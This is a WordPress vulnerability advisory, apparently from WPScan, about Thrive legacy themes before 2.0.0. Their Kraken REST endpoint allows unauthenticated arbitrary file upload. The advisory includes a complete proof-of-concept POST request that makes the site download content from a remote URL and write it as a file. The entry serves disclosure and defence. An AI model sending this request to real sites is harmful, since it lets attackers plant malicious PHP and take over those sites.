Themes Vulnerabilities
All Thrive Themes Legacy Themes < 2.0.0 - Unauthenticated Arbitrary File Upload and Option Deletion
Description
Thrive “Legacy” themes register a REST API endpoint to compress images using the Kraken image optimization engine. By supplying a crafted request in combination with data inserted using the Option Update vulnerability, it was possible to use this endpoint to retrieve malicious code from a remote URL and overwrite an existing file on the site with it or create a new file.This includes executable PHP files that contain malicious code.
Proof of Concept
POST /wp-json/thrive/kraken HTTP/1.1
Host: [URL]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 104
{"id":"td_optin_webhook","results":{"http:\/\/key":{"kraked_url":"https:\/\/ramgall.com\/license.txt"}}}
Affects Themes
Fixed in 2.0.0 References
CVE
Miscellaneous
Original Researcher
Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter
Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-03-24 (about 3 years ago)
Added
2021-03-24 (about 3 years ago)
Last Updated
2021-03-31 (about 3 years ago)
WPScan 